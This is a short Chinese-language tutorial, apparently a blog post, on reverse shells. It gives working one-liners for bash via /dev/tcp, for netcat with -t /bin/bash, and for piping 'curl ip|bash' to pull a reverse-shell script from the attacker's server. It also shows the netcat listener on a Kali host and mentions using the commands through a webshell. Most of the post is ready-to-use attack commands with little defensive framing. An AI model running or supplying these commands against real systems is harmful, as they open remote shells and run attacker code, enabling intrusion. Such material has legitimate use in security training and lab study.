1.bash反彈shell
個人感覺bash反彈是最簡單、也是最常見的一種。
bash -i >& /dev/tcp/192.168.20.151/8080 0>&1
bash一句話命令詳解以下針對常用的bash反彈一句話進行了拆分說明,具體內容如下。

其實以上bash反彈一句完整的解讀過程就是:
bash產生了一個交互環境與本地主機主動發起與目標主機8080端口建立的連接(即TCP 8080 會話連接)相結合,然后在重定向個tcp 8080會話連接,最后將用戶鍵盤輸入與用戶標準輸出相結合再次重定向給一個標準的輸出,即得到一個bash 反彈環境。在反彈shell時要借助netcat工具反彈
Netcat 一句話反彈:Netcat反彈也是非常常用的方法,只是這個方法需要我們手動去安裝一個NC環境
開啟外網主機監聽
root@kali:~# nc -lvvp 8080
listening on [any] 8080 ...
kali : 192.168.20.151centos:192.168.20.130
先用kali開啟監聽:然后centos執行bash一句話。


成功反彈。
2.netcat 一句話反彈
~ nc 192.168.31.151 7777 -t /bin/bash
命令詳解:通過webshell我們可以使用nc命令直接建立一個tcp 8080 的會話連接,然后將本地的bash通過這個會話連接反彈給目標主機(192.168.31.151)。
先開啟監聽7777端口。


3.curl反彈shell
前提要利用bash一句話的情況下使用curl反彈shell
在存在命令執行的服務器上執行curl ip|bash,該ip的index文件上含有bash一句話,就可以反彈shell。
例如在自己的服務器index上寫上一句話
bash -i >& /dev/tcp/192.168.20.151/7777 0>&1
192.168.20.151就是作為監聽端口的服務器用來得到反彈的shell。

存在一句話,利用curl反彈。kali開啟監聽


上述內容不知道大家學習到了嗎?網絡世界的安全漏洞每天都會出現,安全知識和安全意識每個公民都應該了解和學習,有想學習網絡安全技能的小伙伴可以隨時私信我哦!